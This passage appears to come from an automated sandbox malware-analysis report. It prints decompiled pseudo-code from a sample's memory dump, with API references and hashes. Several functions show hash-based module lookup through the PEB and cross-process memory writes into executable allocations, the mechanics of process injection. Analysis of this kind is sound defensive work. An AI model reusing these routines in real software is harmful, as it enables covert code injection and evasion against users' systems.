					_t86 =  *(_v36 + _t93 * 2) & 0x0000ffff;
					__eflags = _t86;
					if(_t86 == 0) {
						break;
					}
					_t70 = _t70 + 0xfffffffe;
					 *( *_t100 + _t93 * 2) = _t86;
					_t83 = _v44;
					__eflags = _t83 - _t73;
					_v44 = _t83 - 1;
					if(_t83 == _t73) {
						L33:
						__eflags = _v44;
						_t72 =  ==  ? 0xfffffffe - _t70 :  ~_t70;
						_t85 =  *_t100;
						_t73 = 0 | _v44 != 0x00000000;
						 *((short*)( ==  ? 0xfffffffe - _t70 :  ~_t70)) = 0;
						goto L12;
					}
					__eflags = _t93 - 0x7ffffffd;
					_t93 = _t93 + 1;
					if(__eflags != 0) {
						continue;
					}
					goto L33;
				}
				_t85 =  *_t100;
				 *((short*)(_t85 + _t93 * 2)) = 0;
				goto L12;
			}

0x005d41a7
0x005d41ab
0x005d41ad
0x005d41b1
0x005d41b5
0x005d41bb
0x005d42f0
0x005d42f9
0x005d42f9
0x005d41cd
0x005d41d2
0x005d41d7
0x00000000
0x00000000
0x005d41dd
0x005d41ea
0x005d41f0
0x005d41f1
0x005d41f2
0x005d41f3
0x005d41f7
0x005d41fc
0x005d41ff
0x005d4203
0x005d4205
0x005d420a
0x005d420f
0x005d427d
0x005d427d
0x005d4281
0x005d4286
0x005d4289
0x005d428e
0x005d428e
0x005d4293
0x005d42ab
0x005d42ad
0x005d42c5
0x005d42c5
0x005d42cb
0x005d42ce
0x005d42d3
0x005d42d3
0x005d42d6
0x005d42da
0x005d42e0
0x005d42e3
0x005d42e8
0x005d42e8
0x005d42ee
0x00000000
0x005d42ee
0x005d42af
0x005d42b1
0x005d42b8
0x005d42bd
0x005d42c0
0x005d42c1
0x00000000
0x005d4295
0x005d4295
0x005d4297
0x005d429e
0x005d42a3
0x005d42a6
0x005d42a7
0x00000000
0x005d4297
0x005d4293
0x005d4215
0x005d421a
0x005d4222
0x005d422e
0x005d422f
0x005d4230
0x005d4231
0x005d4234
0x005d4239
0x005d423e
0x005d4273
0x005d4275
0x005d427b
0x005d427b
0x00000000
0x005d427b
0x005d4244
0x005d4248
0x005d4279
0x005d4279
0x00000000
0x005d4279
0x005d424c
0x005d4251
0x005d4252
0x005d425e
0x005d425f
0x005d4268
0x00000000
0x00000000
0x005d426a
0x005d426c
0x00000000
0x005d426c
0x005d42fc
0x005d42fe
0x005d4303
0x005d4306
0x005d4397
0x00000000
0x005d4397
0x005d430f
0x005d4314
0x005d4317
0x005d4319
0x005d431b
0x00000000
0x00000000
0x005d4323
0x005d4325
0x005d4327
0x005d439e
0x005d43a0
0x005d43a6
0x005d43a6
0x00000000
0x005d43a0
0x005d432d
0x005d4331
0x005d4333
0x005d4338
0x005d433e
0x005d4342
0x005d4342
0x005d4343
0x005d4347
0x005d434b
0x005d434e
0x00000000
0x00000000
0x005d4353
0x005d4356
0x005d435a
0x005d435e
0x005d4363
0x005d4367
0x005d4374
0x005d437f
0x005d4384
0x005d4387
0x005d438a
0x005d438d
0x00000000
0x005d438d
0x005d4369
0x005d436f
0x005d4372
0x00000000
0x00000000
0x00000000
0x005d4372
0x005d43b0
0x005d43b3
0x00000000

Memory Dump Source

Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c0000_______.jbxd

Similarity

API ID: ByteCharMultiWide
String ID:
API String ID: 626452242-0
Opcode ID: b351f703aa12de2789d53f233674a2e8121e6814b89f26de365a386e056883d4
Instruction ID: b71e4a90bf743103553168c92d699bb13fca958c77898aa7b55b20067ff9582d
Opcode Fuzzy Hash: b351f703aa12de2789d53f233674a2e8121e6814b89f26de365a386e056883d4
Instruction Fuzzy Hash: 46515C756083029FD720DE6DC885B2BBAE5BFD4344F14892EF89987391E731D845CB52

Uniqueness

Uniqueness Score: -1.00%

Function 005C8230, Relevance: .2, Instructions: 150
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E005C8230() {
				char _t54;
				intOrPtr _t58;
				signed char _t66;
				void* _t67;
				intOrPtr _t71;
				signed char _t80;
				void* _t81;
				intOrPtr* _t82;
				signed char* _t86;
				intOrPtr _t87;
				void* _t88;
				void* _t91;
				intOrPtr _t94;
				signed char _t95;
				intOrPtr* _t98;
				char _t99;
				signed char _t103;
				char _t104;
				char _t109;
				signed char* _t110;
				void* _t112;
				void* _t113;
				void* _t114;
				void* _t115;
				char _t118;

				_t98 =  *((intOrPtr*)(_t115 + 0x20));
				_t86 =  *(_t115 + 0x24);
				_t54 =  *_t98;
				_t110 = _t86;
				if(_t54 != 0) {
					_t82 =  *((intOrPtr*)(_t115 + 0x28));
					_t109 = 0;
					do {
						_t118 =  *((char*)(_t98 + _t109 + 1));
						_t109 = _t109 + 1;
					} while (_t118 != 0);
					_t110 = _t86;
					_t87 = 0;
					_t112 = 0;
					while(1) {
						 *((char*)(_t115 + _t112 + 1)) = _t54;
						_t112 = _t112 + 1;
						_t109 = _t109 - 1;
						if(_t112 != 4) {
							goto L17;
						}
						 *((intOrPtr*)(_t115 + 8)) = _t87;
						_t94 =  *_t82;
						_t114 = 0;
						do {
							if(_t94 != 0) {
								_t99 = 0;
								_t71 = _t94;
								while(_t71 != _t71) {
									_t71 =  *((intOrPtr*)(_t82 + _t99 + 1));
									_t99 = _t99 + 1;
									if(_t71 != 0) {
										continue;
									} else {
									}
									goto L13;
								}
								 *((char*)(_t115 + _t114 + 1)) = _t99;
							}
							L13:
							_t114 = _t114 + 1;
						} while (_t114 != 4);
						_t95 =  *(_t115 + 2);
						_t103 = _t95 >> 0x00000004 & 0x00000003 |  *(_t115 + 1) << 0x00000002;
						 *(_t115 + 5) = _t103;
						_t80 = ( *(_t115 + 3) << 0x00000006) +  *((intOrPtr*)(_t115 + 4)) >> 0x00000002 & 0x0000000f | _t95 << 0x00000004;
						 *(_t115 + 6) = _t80;
						 *(_t115 + 7) = _t80;
						_t81 = 0xfffffffe;
						 *_t110 = _t103;
						do {
							_t110[_t81 + 3] =  *((intOrPtr*)(_t115 + _t81 + 8));
							_t81 = _t81 + 1;
						} while (_t81 != 0);
						_t98 =  *((intOrPtr*)(_t115 + 0x20));
						_t87 =  *((intOrPtr*)(_t115 + 8));
						_t110 =  &(_t110[3]);
						_t112 = 0;
						L17:
						if(_t109 != 0) {
							_t87 = _t87 + 1;
							_t54 =  *((intOrPtr*)(_t98 + _t87));
							continue;
						}
						if(_t112 != 0) {
							if(_t112 <= 3) {
								E005D6610(_t115 + _t112 + 1, 0, 4 - _t112);
								_t115 = _t115 + 0xc;
							}
							_t88 = 0;
							 *((char*)(_t115 + 8)) =  *_t82;
							do {
								if( *((char*)(_t115 + 8)) != 0) {
									_t58 =  *((intOrPtr*)(_t115 + 8));
									_t104 = 0;
									while(_t58 != _t58) {
										_t58 =  *((intOrPtr*)(_t82 + _t104 + 1));
										_t104 = _t104 + 1;
										if(_t58 != 0) {
											continue;
										} else {
										}
										goto L28;
									}
									 *((char*)(_t115 + _t88 + 1)) = _t104;
								}
								L28:
								_t88 = _t88 + 1;
							} while (_t88 != 4);
							_t66 =  *(_t115 + 2) >> 0x00000002 >> 0x00000004 & 3 |  *(_t115 + 2) << 0x00000004 |  *(_t115 + 1) << 0x00000002;
							 *(_t115 + 5) = _t66;
							 *(_t115 + 6) = _t66;
							 *(_t115 + 7) = ( *(_t115 + 3) << 6) +  *((intOrPtr*)(_t115 + 4));
							if(_t112 >= 2) {
								_t48 = _t112 - 1; // -1
								_t91 = _t48;
								 *_t110 = _t66;
								if(_t91 != 1) {
									_t113 = _t112 + 0xfffffffe;
									_t67 = 0;
									do {
										_t110[_t67 + 1] =  *((intOrPtr*)(_t115 + _t67 + 6));
										_t67 = _t67 + 1;
									} while (_t113 != _t67);
								}
								_t110 =  &(_t110[_t91]);
							}
						}
						_t86 =  *(_t115 + 0x24);
						goto L35;
					}
				}
				L35:
				 *_t110 = 0;
				return _t110 - _t86;
			}

0x005c8237
0x005c823b
0x005c823f
0x005c8241
0x005c8245
0x005c824b
0x005c824f
0x005c8251
0x005c8251
0x005c8256
0x005c8256
0x005c825b
0x005c825d
0x005c825f
0x005c8267
0x005c8267
0x005c826b
0x005c826c
0x005c8270
0x00000000
0x00000000
0x005c8276
0x005c827a
0x005c827c
0x005c827e
0x005c8280
0x005c8286
0x005c8288
0x005c828a
0x005c828e
0x005c8292
0x005c8295
0x00000000
0x00000000
0x005c8297
0x00000000
0x005c8295
0x005c8299
0x005c8299
0x005c829d
0x005c829d
0x005c829e
0x005c82a3
0x005c82b9
0x005c82bf
0x005c82d2
0x005c82d4
0x005c82d8
0x005c82dc
0x005c82e1
0x005c82e3
0x005c82e7
0x005c82eb
0x005c82eb
0x005c82ee
0x005c82f2
0x005c82f6
0x005c82f9
0x005c82fb
0x005c82fd
0x005c8263
0x005c8264
0x00000000
0x005c8264
0x005c8305
0x005c830e
0x005c831f
0x005c8324
0x005c8324
0x005c8329
0x005c832b
0x005c832f
0x005c8334
0x005c833a
0x005c833e
0x005c8340
0x005c8344
0x005c8348
0x005c834b
0x00000000
0x00000000
0x005c834d
0x00000000
0x005c834b
0x005c834f
0x005c834f
0x005c8353
0x005c8353
0x005c8354
0x005c8388
0x005c838c
0x005c8390
0x005c8394
0x005c8398
0x005c839a
0x005c839a
0x005c839d
0x005c83a2
0x005c83a4
0x005c83a7
0x005c83a9
0x005c83ad
0x005c83b1
0x005c83b2
0x005c83a9
0x005c83b6
0x005c83b6
0x005c8398
0x005c83b8
0x00000000
0x005c83b8
0x005c8267
0x005c83bc
0x005c83bc
0x005c83ca

Memory Dump Source

Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c0000_______.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02d520aaa1d0b6d6d3f0341f50212f7a6a71168bf493bc00282c66eedb8a6717
Instruction ID: 945c7ad93c44089b3d88ffab3061e6b0294c57926cbac7ae47f00f4b21f82bad
Opcode Fuzzy Hash: 02d520aaa1d0b6d6d3f0341f50212f7a6a71168bf493bc00282c66eedb8a6717
Instruction Fuzzy Hash: 7051152944C3C55EE3268AA898587FBBFD2ABE6704F0C89ACD4DC07743D866840AD752

Uniqueness

Uniqueness Score: -1.00%

Function 005C35D0, Relevance: .1, Instructions: 80
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E005C35D0(intOrPtr _a4) {
				char _v528;
				void* _t12;
				unsigned int _t13;
				signed char* _t19;
				signed char _t20;
				signed char _t25;
				intOrPtr _t27;
				void* _t32;
				char* _t33;
				signed char* _t34;
				signed int _t35;
				intOrPtr _t38;
				intOrPtr _t39;
				char _t40;
				intOrPtr* _t42;
				intOrPtr* _t45;

				_t27 =  *[fs:0x30];
				if(_t27 != 0) {
					_t38 =  *((intOrPtr*)(_t27 + 0xc));
					_t42 =  *((intOrPtr*)(_t38 + 0x14));
					if(_t42 != 0) {
						_t39 = _t38 + 0x14;
						if(_t39 != _t42) {
							_t19 =  &_v528;
							 *_t45 = _t39;
							do {
								_t12 = E005C4390(_t19,  *((intOrPtr*)(_t42 + 0x28)));
								_t45 = _t45 + 8;
								if(_t12 <= 0) {
									_t13 = 0;
									L14:
									if(((_t13 >> 0x0000000b ^ _t13) << 0xf) + (_t13 >> 0x0000000b ^ _t13) == _a4) {
										return  *((intOrPtr*)(_t42 + 0x10));
									}
									goto L15;
								}
								_t34 = _t19;
								_t32 = _t12 + 1;
								do {
									_t20 =  *_t34;
									if(_t20 == 0) {
										break;
									}
									_t25 = _t20 + 0xbf;
									if(_t25 <= 0x19) {
										 *_t34 = _t25 | 0x00000020;
									}
									_t32 = _t32 - 1;
									_t34 =  &(_t34[1]);
								} while (_t32 > 1);
								_t35 = 0;
								_t33 =  &_v528;
								do {
									_t40 =  *_t33;
									_t33 = _t33 + 1;
									_t35 = (_t40 + _t35 << 0x0000000a) + _t40 + _t35 >> 0x00000006 ^ (_t40 + _t35 << 0x0000000a) + _t40 + _t35;
									_t12 = _t12 - 1;
								} while (_t12 != 0);
								_t39 =  *_t45;
								_t13 = _t35 + _t35 * 8;
								goto L14;
								L15:
								_t42 =  *_t42;
								_t19 =  &_v528;
							} while (_t39 != _t42);
							return 0;
						}
					}
				}
				return 0;
			}

0x005c35da
0x005c35e5
0x005c35eb
0x005c35ee
0x005c35f3
0x005c35f9
0x005c35fe
0x005c3606
0x005c360a
0x005c360e
0x005c3612
0x005c3617
0x005c361c
0x005c3663
0x005c3665
0x005c367a
0x00000000
0x005c368a
0x00000000
0x005c367a
0x005c3620
0x005c3622
0x005c3623
0x005c3623
0x005c3627
0x00000000
0x00000000
0x005c362b
0x005c3631
0x005c3636
0x005c3636
0x005c3638
0x005c3639
0x005c363a
0x005c363e
0x005c3640
0x005c3644
0x005c3644
0x005c3647
0x005c3656
0x005c3658
0x005c3658
0x005c365b
0x005c365e
0x00000000
0x005c367c
0x005c367c
0x005c367e
0x005c3682
0x00000000
0x005c3686
0x005c35fe
0x005c35f3
0x005c3697

Memory Dump Source

Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c0000_______.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7621d7489aa0096e337dc9dfcb852a2d3ba525b4feec683653574ba13adb86e1
Instruction ID: a198e8154180a7a9ccfd4ce4b25d7dc965c8a4b1ddc8185a3585015ce206ff50
Opcode Fuzzy Hash: 7621d7489aa0096e337dc9dfcb852a2d3ba525b4feec683653574ba13adb86e1
Instruction Fuzzy Hash: B72168327042486FD72489A8C890F6ABBE1FBC4750F1D892CC486C7341E630ED85C791

Uniqueness

Uniqueness Score: -1.00%

Function 005D3DF0, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 102
synchronizationinjectionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E005D3DF0(void* __ecx) {
				intOrPtr _v44;
				intOrPtr _v84;
				char _v128;
				int _t25;
				void* _t33;
				void* _t34;
				DWORD* _t40;
				void* _t50;
				void* _t53;
				void* _t54;
				DWORD* _t55;

				_t53 = __ecx;
				_t40 = _t55;
				_t54 =  &_v128;
				 *_t40 = 0;
				_t25 = ReadProcessMemory( *(__ecx + 0x70),  *(__ecx + 0x94), _t54, 0x70, _t40);
				_t50 = 0;
				if(_t25 != 0 &&  *_t55 == 0x70) {
					_v84 = 2;
					 *_t55 = 0;
					if(WriteProcessMemory( *(_t53 + 0x70),  *(_t53 + 0x94), _t54, 0x70, _t40) != 0 &&  *_t55 == 0x70 && E005CB710(_t28, _t53) != 0) {
						 *_t55 = 0;
						if(ReadProcessMemory( *(_t53 + 0x70),  *(_t53 + 0x94), _t54, 0x70, _t40) != 0 &&  *_t55 == 0x70 && _v44 != 0 && WaitForSingleObject( *(_t53 + 0x74), 0xffffffff) == 0) {
							_t33 =  *(_t53 + 0x94);
							if(_t33 != 0) {
								VirtualFreeEx( *(_t53 + 0x70), _t33, 0, 0x8000);
							}
							_t34 =  *(_t53 + 0x98);
							if(_t34 != 0) {
								VirtualFreeEx( *(_t53 + 0x70), _t34, 0, 0x8000);
							}
							 *(_t53 + 0x94) = 0;
							 *(_t53 + 0x98) = 0;
							 *((intOrPtr*)(_t53 + 0x7c)) = 0;
							CloseHandle( *(_t53 + 0x88));
							 *(_t53 + 0x88) = 0;
							CloseHandle( *(_t53 + 0x8c));
							 *(_t53 + 0x8c) = 0;
							CloseHandle( *(_t53 + 0x90));
							 *(_t53 + 0x90) = 0;
							_t50 = 1;
						}
					}
				}
				return _t50;
			}

0x005d3df7
0x005d3e02
0x005d3e04
0x005d3e0d
0x005d3e18
0x005d3e1e
0x005d3e22
0x005d3e32
0x005d3e48
0x005d3e5c
0x005d3e84
0x005d3e9d
0x005d3ec7
0x005d3ecf
0x005d3edc
0x005d3edc
0x005d3ee2
0x005d3eea
0x005d3ef7
0x005d3ef7
0x005d3f05
0x005d3f0b
0x005d3f11
0x005d3f1a
0x005d3f1c
0x005d3f28
0x005d3f2a
0x005d3f36
0x005d3f38
0x005d3f40
0x005d3f40
0x005d3e9d
0x005d3e5c
0x005d3f4a

APIs

ReadProcessMemory.KERNEL32(?,?,?,00000070), ref: 005D3E18
WriteProcessMemory.KERNEL32(?,?,?,00000070), ref: 005D3E54

Part of subcall function 005CB710: SignalObjectAndWait.KERNEL32(?,?,00007530,00000000), ref: 005CB731
Part of subcall function 005CB710: GetExitCodeThread.KERNEL32(?,?,?,?,005D3E73), ref: 005CB753
Part of subcall function 005CB710: WaitForSingleObject.KERNEL32(?,000001F4), ref: 005CB76F

ReadProcessMemory.KERNEL32(?,?,?,00000070), ref: 005D3E95
WaitForSingleObject.KERNEL32(?,000000FF), ref: 005D3EBD
VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 005D3EDC
VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 005D3EF7
CloseHandle.KERNEL32(?), ref: 005D3F1A
CloseHandle.KERNEL32(?), ref: 005D3F28
CloseHandle.KERNEL32(?), ref: 005D3F36

Strings

p, xrefs: 005D3E62
p, xrefs: 005D3E28
p, xrefs: 005D3EA3

Memory Dump Source

Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c0000_______.jbxd

Similarity

API ID: CloseHandleMemoryObjectProcessWait$FreeReadSingleVirtual$CodeExitSignalThreadWrite
String ID: p$p$p
API String ID: 3929978480-3854358385
Opcode ID: 45d759241020f19da12a2530c7cad9abbeef085c3e7a45a82ff29244400b909b
Instruction ID: d35c57c6c3ccb748d943b81de0288dbadff0ae4c6edd2bbf880a740c8c4fe766
Opcode Fuzzy Hash: 45d759241020f19da12a2530c7cad9abbeef085c3e7a45a82ff29244400b909b
Instruction Fuzzy Hash: 71311670A10605AFE7309B39CC48F67BBE9FB84744F10491FE99A862A0CA75AD45CB21

Uniqueness

Uniqueness Score: -1.00%

Function 005CD9C0, Relevance: 16.7, APIs: 11, Instructions: 241
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E005CD9C0(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, void* _a20, intOrPtr* _a24, intOrPtr* _a28, void* _a32) {
				long _v20;
				void _v28;
				void** _v36;
				void* _v40;
				void* _v44;
				void* _v48;
				void* _v52;
				void* _v56;
				void _v60;
				long _v64;
				void* _t68;
				void* _t70;
				void* _t71;
				void* _t72;
				void* _t73;
				void* _t74;
				void* _t83;
				void* _t93;
				void* _t98;
				long _t101;
				long _t102;
				intOrPtr _t107;
				long _t113;
				long* _t114;
				intOrPtr _t120;
				void* _t121;
				intOrPtr* _t122;
				DWORD* _t123;
				void* _t124;
				intOrPtr* _t125;
				void* _t126;
				DWORD* _t128;

				_t124 = __ecx;
				_t113 = 0;
				_t68 = memset( &_v60, 0, 0xb << 2);
				_t128 =  &(( &_v52)[3]);
				if( *((intOrPtr*)(_t124 + 0x80)) == 0) {
					L39:
					return _t113;
				}
				_t120 = _a8;
				_t101 = 0;
				_v64 = 0;
				if(_t120 == 0) {
					L3:
					if(_a16 == 0) {
						L5:
						_t121 = 0;
						_t126 = 0;
						if(_a20 == 0) {
							L7:
							if(_a32 == 0) {
								L9:
								_t70 = VirtualAllocEx( *(_t124 + 0x70), 0, 8, 0x3000, 0x40);
								_v44 = _t70;
								if(_t70 == 0) {
									L26:
									_t71 = _v44;
									if(_t71 != 0) {
										VirtualFreeEx( *(_t124 + 0x70), _t71, 0, 0x8000);
									}
									_t72 = _v52;
									if(_t72 != 0) {
										VirtualFreeEx( *(_t124 + 0x70), _t72, 0, 0x8000);
									}
									_t73 = _v48;
									if(_t73 != 0) {
										VirtualFreeEx( *(_t124 + 0x70), _t73, 0, 0x8000);
									}
									_t74 = _v60;
									if(_t74 != 0) {
										VirtualFreeEx( *(_t124 + 0x70), _t74, 0, 0x8000);
									}
									_t113 = _v20;
									_t122 = _a28;
									_t125 = _a24;
									if(_t113 == 0) {
										_t77 = _v36;
										if(_v36 == 0) {
											_t113 = 0;
										} else {
											E005C91E0(_t77);
											_t113 = _v20;
										}
									}
									 *_t122 = _v28;
									 *_t125 = _v36;
									goto L39;
								}
								_t114 =  &_v20;
								_t107 = _t70 + 4;
								 *(_t114 - 0x14) = _t70;
								 *((intOrPtr*)(_t114 - 0xc)) = _t107;
								_push(0);
								_push(_t121);
								_push(_t107);
								_push(_t70);
								_push(_t126);
								_push(_a16);
								_push(_v64);
								_push(_t101);
								_push(_a4);
								_push(_t114);
								_push(9);
								_push( *((intOrPtr*)(_t124 + 0xa4)));
								_push(_t124);
								_t83 = E005D3FA0();
								_t128 =  &(_t128[0xd]);
								if(_t83 == 0 || _v20 == 0) {
									goto L26;
								} else {
									_t123 = _t128;
									 *_t123 = 0;
									if(ReadProcessMemory( *(_t124 + 0x70), _v52, _a32, 0x80, _t123) == 0 ||  *_t128 != 0x80) {
										L25:
										_v20 = 0;
										goto L26;
									} else {
										 *_t128 = 0;
										if(ReadProcessMemory( *(_t124 + 0x70), _v56, _a20, 0x400, _t123) == 0 ||  *_t128 != 0x400) {
											goto L25;
										} else {
											 *_t128 = 0;
											if(ReadProcessMemory( *(_t124 + 0x70),  *( &_v28 - 4),  &_v28, 4, _t123) == 0 ||  *_t128 != 4) {
												goto L25;
											} else {
												_t91 = _v28;
												if(_v28 == 0) {
													goto L26;
												}
												_t93 = E005C3180(_t91 + 4, 0);
												_t128 =  &(_t128[2]);
												_v36 = _t93;
												if(_t93 == 0) {
													goto L25;
												}
												 *_t128 = 0;
												if(ReadProcessMemory( *(_t124 + 0x70), _v40, _t93, 4, _t123) == 0 ||  *_t128 != 4) {
													goto L25;
												} else {
													_t102 = _v28;
													 *_t128 = 0;
													if(ReadProcessMemory( *(_t124 + 0x70),  *_v36,  &(_v36[1]), _t102, _t123) == 0 ||  *_t128 != _t102) {
														goto L25;
													} else {
														_v36 =  &(_v36[1]);
														goto L26;
													}
												}
											}
										}
									}
								}
							}
							_t98 = E005C9CD0(_t68,  *(_t124 + 0x70), _a32, 0x80);
							_t128 =  &(_t128[3]);
							_t121 = _t98;
							_v52 = _t98;
							if(_t98 == 0) {
								goto L26;
							}
							goto L9;
						}
						_t68 = E005C9CD0(_t68,  *(_t124 + 0x70), _a20, 0x400);
						_t128 =  &(_t128[3]);
						_t126 = _t68;
						_v56 = _t68;
						if(_t68 == 0) {
							goto L26;
						}
						goto L7;
					}
					_t68 = E005C9CD0(_t68,  *(_t124 + 0x70), _a12, _a16);
					_t128 =  &(_t128[3]);
					_v48 = _t68;
					_v64 = _t68;
					if(_t68 == 0) {
						goto L26;
					}
					goto L5;
				}
				_v28 =  *0x5d9d28(_t120) + 1;
				_t68 = E005C9CD0( *0x5d9d28(_t120) + 1,  *(_t124 + 0x70), _t120,  *0x5d9d28(_t120) + 1);
				_t128 =  &(_t128[3]);
				_t101 = _t68;
				_v64 = _t68;
				if(_t68 == 0) {
					goto L26;
				}
				goto L3;
			}

0x005cd9c7
0x005cd9d4
0x005cd9d6
0x005cd9d6
0x005cd9df
0x005cdcb3
0x005cdcbc
0x005cdcbc
0x005cd9e5
0x005cd9e9
0x005cd9ee
0x005cd9f8
0x005cda21
0x005cda26
0x005cda4b
0x005cda4b
0x005cda52
0x005cda57
0x005cda7b
0x005cda80
0x005cdaa4
0x005cdab2
0x005cdaba
0x005cdabe
0x005cdc1a
0x005cdc1a
0x005cdc20
0x005cdc2d
0x005cdc2d
0x005cdc33
0x005cdc39
0x005cdc46
0x005cdc46
0x005cdc4c
0x005cdc52
0x005cdc5f
0x005cdc5f
0x005cdc65
0x005cdc6b
0x005cdc78
0x005cdc78
0x005cdc7e
0x005cdc82
0x005cdc86
0x005cdc8c
0x005cdc8e
0x005cdc94
0x005cdca5
0x005cdc96
0x005cdc97
0x005cdc9f
0x005cdc9f
0x005cdc94
0x005cdcab
0x005cdcb1
0x00000000
0x005cdcb1
0x005cdac6
0x005cdaca
0x005cdacd
0x005cdad0
0x005cdad3
0x005cdad5
0x005cdad6
0x005cdad7
0x005cdad8
0x005cdad9
0x005cdadd
0x005cdae1
0x005cdae2
0x005cdae6
0x005cdae7
0x005cdae9
0x005cdaef
0x005cdaf0
0x005cdaf5
0x005cdafa
0x00000000
0x005cdb0c
0x005cdb13
0x005cdb15
0x005cdb2f
0x005cdc12
0x005cdc12
0x00000000
0x005cdb42
0x005cdb49
0x005cdb64
0x00000000
0x005cdb77
0x005cdb7e
0x005cdb96
0x00000000
0x005cdb9e
0x005cdb9e
0x005cdba4
0x00000000
0x00000000
0x005cdbac
0x005cdbb1
0x005cdbb6
0x005cdbba
0x00000000
0x00000000
0x005cdbc3
0x005cdbd8
0x00000000
0x005cdbe0
0x005cdbe4
0x005cdbf0
0x005cdc04
0x00000000
0x005cdc0b
0x005cdc0b
0x00000000
0x005cdc0b
0x005cdc04
0x005cdbd8
0x005cdb96
0x005cdb64
0x005cdb2f
0x005cdafa
0x005cda8e
0x005cda93
0x005cda96
0x005cda9a
0x005cda9e
0x00000000
0x00000000
0x00000000
0x005cda9e
0x005cda65
0x005cda6a
0x005cda6d
0x005cda71
0x005cda75
0x00000000
0x00000000
0x00000000
0x005cda75
0x005cda33
0x005cda38
0x005cda3d
0x005cda41
0x005cda45
0x00000000
0x00000000
0x00000000
0x005cda45
0x005cda02
0x005cda0b
0x005cda10
0x005cda13
0x005cda17
0x005cda1b
0x00000000
0x00000000
0x00000000

APIs

lstrlen.KERNEL32(?), ref: 005CD9FB

Part of subcall function 005C9CD0: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,00000000,?,00000000,?,?,005CDA93,?,?,00000080), ref: 005C9CE8
Part of subcall function 005C9CD0: WriteProcessMemory.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,005CDA93,?,?,00000080), ref: 005C9D07

VirtualAllocEx.KERNEL32(?,00000000,00000008,00003000,00000040), ref: 005CDAB2
ReadProcessMemory.KERNEL32(?,?,?,00000080), ref: 005CDB27
ReadProcessMemory.KERNEL32(?,?,?,00000400), ref: 005CDB5C
ReadProcessMemory.KERNEL32(?,?,?,00000004), ref: 005CDB8E

Part of subcall function 005C3180: GetProcessHeap.KERNEL32(00000000,00000000,005D2549,?,00000000,00000001,00000000), ref: 005C3193
Part of subcall function 005C3180: RtlReAllocateHeap.NTDLL(00230000,00000008,?,?), ref: 005C31B0

ReadProcessMemory.KERNEL32(?,?,00000000,00000004), ref: 005CDBD0
ReadProcessMemory.KERNEL32(?,?,?,?), ref: 005CDBFC
VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 005CDC2D
VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 005CDC46
VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 005CDC5F
VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 005CDC78

Memory Dump Source

Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true

Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5c0000_______.jbxd

Similarity

API ID: Process$MemoryVirtual$Read$Free$AllocHeap$AllocateWritelstrlen
String ID:
API String ID: 1902996647-0
Opcode ID: 625c2ccfe7a9d0db5d2a5fff9001537cbdfa72141ffe86a0946f4ab570daffcc
Instruction ID: ac4ea215721bb12e39a913081e044216810a3ed50358bebc2fc7f937ffebdd9c
Opcode Fuzzy Hash: 625c2ccfe7a9d0db5d2a5fff9001537cbdfa72141ffe86a0946f4ab570daffcc
Instruction Fuzzy Hash: 7F81E1B5604701AFE7219F65CC49F2BBBF9BB84700F04482DF985D62A0E6B4EC45DB62

Uniqueness

Uniqueness Score: -1.00%

Function 005D13A0, Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 229
sleepstringCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E005D13A0(void* __eflags) {
				intOrPtr _t55;
				intOrPtr _t71;
				intOrPtr* _t72;
				unsigned int _t84;
				WCHAR* _t87;
				signed int* _t90;
				void* _t91;
				WCHAR* _t98;
				void* _t103;
				signed int _t107;
				intOrPtr _t114;
				intOrPtr* _t120;
				signed int _t121;
				signed short _t122;
				intOrPtr* _t123;
				WCHAR* _t124;
				void* _t125;
				void* _t126;
				signed int _t127;
				signed int* _t128;
				signed int* _t131;
				signed int* _t132;

				_t127 = _t128[0x10d];
